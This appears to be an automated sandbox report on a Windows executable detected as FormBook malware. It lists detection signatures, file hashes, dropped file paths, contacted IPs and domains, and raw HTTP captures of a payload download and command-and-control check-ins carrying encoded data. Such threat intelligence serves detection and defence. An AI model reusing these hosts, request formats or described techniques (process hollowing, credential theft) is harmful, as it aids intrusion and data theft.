Windows Analysis Report
SC_0017384.exe

Overview

General Information

Sample Name: SC_0017384.exe
Analysis ID: 831200
MD5: f296a60e1568722b060de70b46357fe6
SHA1: e24c65bd02d435c6b5705e9a01442e0447b77e22
SHA256: 661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Encrypted powershell cmdline option found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: SC_0017384.exe ReversingLabs: Detection: 12%
Source: SC_0017384.exe Virustotal: Detection: 17%
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe ReversingLabs: Detection: 12%
Source: SC_0017384.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Joe Sandbox ML: detected
Source: 3.2.SC_0017384.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: SC_0017384.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: SC_0017384.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 54.85.86.211 80
Source: C:\Windows\explorer.exe Domain query: www.myprojoints.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.152.24 80
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.131 80
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.229 80
Source: C:\Windows\explorer.exe Domain query: www.metatv.app
Source: C:\Windows\explorer.exe Domain query: www.findmyoriginstory.com
Source: C:\Windows\explorer.exe Domain query: www.brunaeleandro.com
Source: C:\Windows\explorer.exe Domain query: www.madisoncountylincoln.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.194.225 80
Source: C:\Windows\explorer.exe Domain query: www.emprendizajesocial.com
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
Source: Yara match File source: 0.2.SC_0017384.exe.6980000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SC_0017384.exe.486b570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 54.85.86.211
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.brunaeleandro.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.brunaeleandro.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brunaeleandro.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LMyfOVNS2ufZwsx7C2B5Iv43WomQXv~Xgq7JpMIhRySn666gfQTGO8nk3h9K00XYD_B4h6N8OojZLO5iS6cQH6tlKcwtYFxUVaQuiQFnYHiuemUcrSM7GQkj0PFpl96GoREz5399N8XpnCTcftmQsw).
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.madisoncountylincoln.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madisoncountylincoln.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmKtKInII1ZZgA0JHRAi1OmXV51zR2hvK3j8qhDcorEmNxRg2D6mKXu3HZVQWG32qXcJkxMiI1We73AuousmMqFlWjuuHIMVhdndgnHMxG_VGWHkizK4Z4bBzR7zRaun0H3TDvClR~W807WYhFcDsng).
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.metatv.appConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.metatv.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.metatv.app/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor1Fz6bdQVXE(mXHtW9kRLAUnFvNZw8cUJ4E0sRzrJNbX9ZKQHDzZTwryWIUpXBdP21UD5hbSchz(UIwwpnsOMvz6kggcYnnK351oSTTSnDXHVcOQVCJ99iuXen0jHCYeYihIGoAydHq8WK3SO86tQ).
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 21 Mar 2023 08:11:27 GMTServer: Apache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Mar 2023 08:11:38 GMTServer: ApacheContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Mar 2023 08:11:42 GMTServer: Apache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:03 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=9fd82tovui4062jsi2krb883uj; expires=Tue, 21-Mar-2023 09:11:05 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KWaFRMSY0lCpPiDwf8DPuoaa0gu1Sb1Kcm8IfI25sJnbf5w3hc1ru9gPYcFjKOGzU60ooqcsEsBwFrc261uXwRK6O8iqCp6UGCkkqv2DM%2FuJG%2BATv00MSmQZDFv9Z0Mx7Yt4facPX%2F%2BwNWqW6fAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba46084491e3-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:05 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=vcue9caqutq1egitp5nphb1rt3; expires=Tue, 21-Mar-2023 09:11:07 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zhXmDCjpuF5r%2Bb9vkduN0KPsoBeKDzLZNY3uaKncUAAqPX6SkIDrpdCezdg4FjjcIBL%2FNo4lSZYEpqmzFAP2h8MVNRFhOst32YstoJPL4qiU5v6bAiqgArzH4QLWvfQu6cu8Y6vH%2BC8E3DIy%2F6M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba562b803a8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e6%2FEJDgHQjcuoYohdj0ra%2F4d26S7I%2F%2Bw3pN85cRgpRzvKvZ8TVLQZ1RwEuiccVevTyJQY4GtfAPWzseKtdfiDGgIup9D4IyI%2FBZWQiByR2tNVx7SRS3S28yavWbxfCbqlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba77cf4a2c63-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j35Ko95Gih9X9oQzlqUwyxDva9uf6%2FviF1QglfgNtSZEGe%2BvokmHM1OjP7qIItQ6rs7MSbtjMUgDnP6CWLGU0vvNzD4P%2BxBg2jK05xN7S4tpFsO4Dhh6v4ufnjsHIFf0bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba87de882c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 21 Mar 2023 08:11:52 GMTcontent-type: text/html; charset=utf-8content-length: 9503set-cookie: AWSALB=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/set-cookie: AWSALBCORS=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/; SameSite=Noneserver: Apachevary: X-Forwarded-Proto,Accept-Encoding,User-Agentset-cookie: session=fda0h9v5c31k27ncfm8cd5p2ff; path=/; domain=.brunaeleandro.com; secure; SameSite=Nonecontent-encoding: gzipconnection: close
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCert
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
